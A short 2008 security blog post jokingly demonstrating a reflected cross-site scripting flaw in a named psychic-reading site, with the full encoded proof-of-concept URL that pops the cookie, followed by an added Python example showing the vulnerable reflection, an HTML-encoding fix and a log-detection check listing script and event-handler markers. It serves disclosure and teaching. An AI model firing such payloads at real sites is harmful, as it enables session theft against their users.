XSS fortune cookie
2008-09-02 16:10:00 by Russ McRee in HolisticInfoSec.org
 
Forgive me in advance for an extremely bad joke, if you can even call it that, but I just can't help it.
Here's how to get an XSS fortune cookie:

1) Ask the mighty Google oracle who might be able to tell you your fortune.
http://www.google.com/search?hl=en&q=tell+my+fortune&btnG=Search&lr=lang_en

2) Select one of the sponsored links; in this case I chose SpiritualExperts.com.

3) Pick a variable. I settled for banid.

4) Ask it if it has a cookie for you.
http://www.spiritualexperts.com/psychic_reading/psychic_reading.asp?banid=%22%3E%3CSCRIPT%3Ealert%28document%2Ecookie%29%3C%2FSCRIPT%3E

Voila...an XSS fortune cookie. Sorry. Really, I am.

The webmaster has been advised...play nice.
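Why the banid reflection in step 4 fires and what stops it, as an added example that is not from the original post: a hypothetical stand-in for the site's ASP template that reflects the parameter unencoded, next to one that HTML-encodes on output, plus a request-line check a defender could run over access logs. The anchor markup, the helper names and the detection markers are assumptions.

```python
# Added example (not code from the original post or the affected site).
# The renderers are hypothetical stand-ins for the page's ASP template.
from html import escape
from urllib.parse import urlparse, parse_qs, unquote

# Constructed copy of the URL quoted in step 4 of the post.
SAMPLE_URL = ("http://www.spiritualexperts.com/psychic_reading/psychic_reading.asp"
              "?banid=%22%3E%3CSCRIPT%3Ealert%28document%2Ecookie%29%3C%2FSCRIPT%3E")


def banid_from(url: str) -> str:
    """Return the percent-decoded banid value exactly as the server sees it."""
    return parse_qs(urlparse(url).query).get("banid", [""])[0]


def render_vulnerable(banid: str) -> str:
    """Reflect banid into an attribute with no output encoding (the defect the post found).
    The leading '">' in the value closes the attribute and the tag, so the
    <SCRIPT> that follows becomes live markup."""
    return f'<a href="/banner.asp?banid={banid}">sponsor</a>'


def render_fixed(banid: str) -> str:
    """Same template, but HTML-encode on output; quote=True turns '"' into &quot;
    so the value can no longer terminate the attribute, and '<' becomes &lt;."""
    return f'<a href="/banner.asp?banid={escape(banid, quote=True)}">sponsor</a>'


def breaks_out(html: str) -> bool:
    """Crude check on rendered output: did untrusted input close the attribute
    and introduce a literal script tag?"""
    return '">' in html and "<script" in html.lower()


def flag_request_line(line: str) -> bool:
    """Detection over one access-log request line: decode once, then look for
    tag or event-handler markers that a numeric banid should never carry."""
    decoded = unquote(line).lower()
    return any(m in decoded for m in ("<script", "javascript:", "onerror=", "onload="))
```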

Screenshot for after they fix the issue.


